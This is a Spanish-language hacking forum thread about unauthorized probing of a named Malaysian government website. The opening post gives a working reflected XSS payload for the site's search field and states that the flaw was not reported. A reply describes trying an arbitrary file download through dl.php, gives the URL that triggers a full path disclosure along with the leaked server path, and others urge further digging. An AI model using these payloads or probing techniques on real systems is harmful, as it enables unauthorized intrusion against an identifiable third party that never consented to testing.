(https://i.imgur.com/dgrjkcQ.png)
- URL: https://www.miros.gov.my
- Vector: search
- Payload: x'"><script>alert(/Drok3r/)</script>
- Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
- Reportado: NO
¡Hola!
No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php
Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
¡Hola!
No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php
Saludos.
Hola...
Muy interesante... igual con un poco de tiempo de logra sacar algo